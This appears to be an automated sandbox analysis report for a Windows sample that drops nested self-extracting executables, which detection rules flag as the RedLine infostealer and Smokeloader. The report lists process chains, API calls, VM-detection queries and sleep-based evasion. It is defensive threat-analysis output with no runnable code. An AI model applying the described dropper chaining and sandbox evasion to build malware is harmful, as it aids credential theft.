                    Source: 5.3.kGO12fD60.exe.8afeb0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.3.kGO12fD60.exe.8afeb0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000005.00000002.401983724.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000005.00000003.346485708.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000005.00000002.402237426.0000000000848000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E81F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00E81F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCode function: 1_2_000C1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_000C1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCode function: 2_2_001F1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_001F1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCode function: 3_2_00DE1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,3_2_00DE1F90
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: String function: 0040E1D8 appears 44 times
                    Source: iOqzwbUlln.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 973536 bytes, 2 files, at 0x2c +A "szV94FU13.exe" +A "rWE40pD80.exe", ID 2077, number 1, 36 datablocks, 0x1503 compression
                    Source: szV94FU13.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 825492 bytes, 2 files, at 0x2c +A "stL82bL52.exe" +A "nAT03lr78.exe", ID 2117, number 1, 32 datablocks, 0x1503 compression
                    Source: stL82bL52.exe.1.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 541618 bytes, 2 files, at 0x2c +A "sQm37qN82.exe" +A "mlf76Mf25.exe", ID 2154, number 1, 21 datablocks, 0x1503 compression
                    Source: sQm37qN82.exe.2.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 252264 bytes, 2 files, at 0x2c +A "iDa05Vg46.exe" +A "kGO12fD60.exe", ID 2030, number 1, 11 datablocks, 0x1503 compression
                    Source: iOqzwbUlln.exe, 00000000.00000003.313758159.00000000046FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs iOqzwbUlln.exe
                    Source: iOqzwbUlln.exe, 00000000.00000003.313758159.00000000046FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKhediviate.exe< vs iOqzwbUlln.exe
                    Source: iOqzwbUlln.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs iOqzwbUlln.exe
                    Source: iOqzwbUlln.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\iDa05Vg46.exe.log
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/10@0/1
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E83FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00E83FEF
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeCode function: 4_2_00007FF815F01B10 ChangeServiceConfigA,4_2_00007FF815F01B10
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E84FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00E84FE0
                    Source: iOqzwbUlln.exeReversingLabs: Detection: 66%
                    Source: iOqzwbUlln.exeVirustotal: Detection: 57%
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\iOqzwbUlln.exe C:\Users\user\Desktop\iOqzwbUlln.exe
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E8597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00E8597D
                    Source: kGO12fD60.exe, 00000005.00000002.404788400.00000000038CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,5_2_004019F0
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCommand line argument: Kernel32.dll0_2_00E82BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCommand line argument: Kernel32.dll1_2_000C2BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCommand line argument: Kernel32.dll2_2_001F2BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCommand line argument: Kernel32.dll3_2_00DE2BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCommand line argument: 08A5_2_00413780
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: iOqzwbUlln.exeStatic file information: File size 1129984 > 1048576
                    Source: iOqzwbUlln.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x10b800
                    Source: iOqzwbUlln.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: iOqzwbUlln.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: iOqzwbUlln.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: iOqzwbUlln.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: iOqzwbUlln.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: iOqzwbUlln.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: iOqzwbUlln.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: Binary string: 'C:\pacokicewiyo4-jub\cuhepasax\lalakexinej68\viz62 neg.pdb0Xp source: stL82bL52.exe, 00000002.00000003.316888493.000000000452A000.00000004.00000020.00020000.00000000.sdmp, mlf76Mf25.exe.2.dr
                    Source: Binary string: wextract.pdb source: iOqzwbUlln.exe, stL82bL52.exe.1.dr, sQm37qN82.exe.2.dr, szV94FU13.exe.0.dr
                    Source: Binary string: wextract.pdbGCTL source: iOqzwbUlln.exe, stL82bL52.exe.1.dr, sQm37qN82.exe.2.dr, szV94FU13.exe.0.dr
                    Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: sQm37qN82.exe, 00000003.00000003.317740077.00000000045A5000.00000004.00000020.00020000.00000000.sdmp, iDa05Vg46.exe, 00000004.00000000.317923256.0000000000322000.00000002.00000001.01000000.00000007.sdmp, iDa05Vg46.exe.3.dr
                    Source: Binary string: _.pdb source: kGO12fD60.exe, 00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402621555.00000000021C6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\pacokicewiyo4-jub\cuhepasax\lalakexinej68\viz62 neg.pdb source: stL82bL52.exe, 00000002.00000003.316888493.000000000452A000.00000004.00000020.00020000.00000000.sdmp, mlf76Mf25.exe.2.dr
                    Source: Binary string: C:\vicirulupixe-he.pdb source: szV94FU13.exe, 00000001.00000003.315638424.0000000004391000.00000004.00000020.00020000.00000000.sdmp, sQm37qN82.exe, 00000003.00000003.317740077.00000000045A5000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000000.341977935.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, kGO12fD60.exe.3.dr, nAT03lr78.exe.1.dr
                    Source: Binary string: WC:\vicirulupixe-he.pdb0Xp source: szV94FU13.exe, 00000001.00000003.315638424.0000000004391000.00000004.00000020.00020000.00000000.sdmp, sQm37qN82.exe, 00000003.00000003.317740077.00000000045A5000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000000.341977935.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, kGO12fD60.exe.3.dr, nAT03lr78.exe.1.dr

                    Data Obfuscation

                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Unpacked PE file: 5.2.kGO12fD60.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Unpacked PE file: 5.2.kGO12fD60.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exe Code function: 0_2_00E8724D push ecx; ret 0_2_00E87260
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe Code function: 1_2_000C724D push ecx; ret 1_2_000C7260
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe Code function: 2_2_001F724D push ecx; ret 2_2_001F7260
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe Code function: 3_2_00DE724D push ecx; ret 3_2_00DE7260
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Code function: 5_2_0041C40C push cs; iretd 5_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Code function: 5_2_00423149 push eax; ret 5_2_00423179
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Code function: 5_2_0041C50E push cs; iretd 5_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Code function: 5_2_004231C8 push eax; ret 5_2_00423179
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Code function: 5_2_0040E21D push ecx; ret 5_2_0040E230
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Code function: 5_2_0041C6BE push ebx; ret 5_2_0041C6BF
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exe Code function: 0_2_00E8202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00E8202A
                    Source: rWE40pD80.exe.0.dr Static PE information: 0xCD858A03 [Fri Apr 7 08:14:59 2079 UTC]
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe File created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exe
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe File created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mlf76Mf25.exe
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exe Code function: 0_2_00E81AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00E81AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe Code function: 1_2_000C1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_000C1AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe Code function: 2_2_001F1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_001F1AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe Code function: 3_2_00DE1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,3_2_00DE1AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe TID: 2484 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe TID: 4708 Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe TID: 2788 Thread sleep count: 3654 > 30
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe TID: 3508 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Code function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,5_2_004019F0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Window / User API: threadDelayed 3654
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_2-2575
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_1-2569
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_0-2453
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mlf76Mf25.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: kGO12fD60.exe, 00000005.00000002.408105242.0000000005B6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
                    Source: kGO12fD60.exe, 00000005.00000002.408105242.0000000005B6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMware856YYPNRWin32_VideoControllerLZUZ_F63VideoController120060621000000.000000-0001166438.display.infMSBDAGEOAR6R2PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors6RZ8VXYCPROKI
                    Source: kGO12fD60.exe, 00000005.00000002.408105242.0000000005B6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exe Code function: 0_2_00E85467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00E85467
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exe Code function: 0_2_00E82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00E82390
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe Code function: 1_2_000C2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_000C2390
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe Code function: 2_2_001F2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_001F2390
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe Code function: 3_2_00DE2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_00DE2390
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exe Code function: 0_2_00E8202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00E8202A
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Code function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040CE09
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Code function: 5_2_0040ADB0 GetProcessHeap,HeapFree,5_2_0040ADB0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe Memory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exe Code function: 0_2_00E86F40 SetUnhandledExceptionFilter,0_2_00E86F40
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exe Code function: 0_2_00E86CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E86CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe Code function: 1_2_000C6F40 SetUnhandledExceptionFilter,1_2_000C6F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe Code function: 1_2_000C6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_000C6CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe Code function: 2_2_001F6F40 SetUnhandledExceptionFilter,2_2_001F6F40
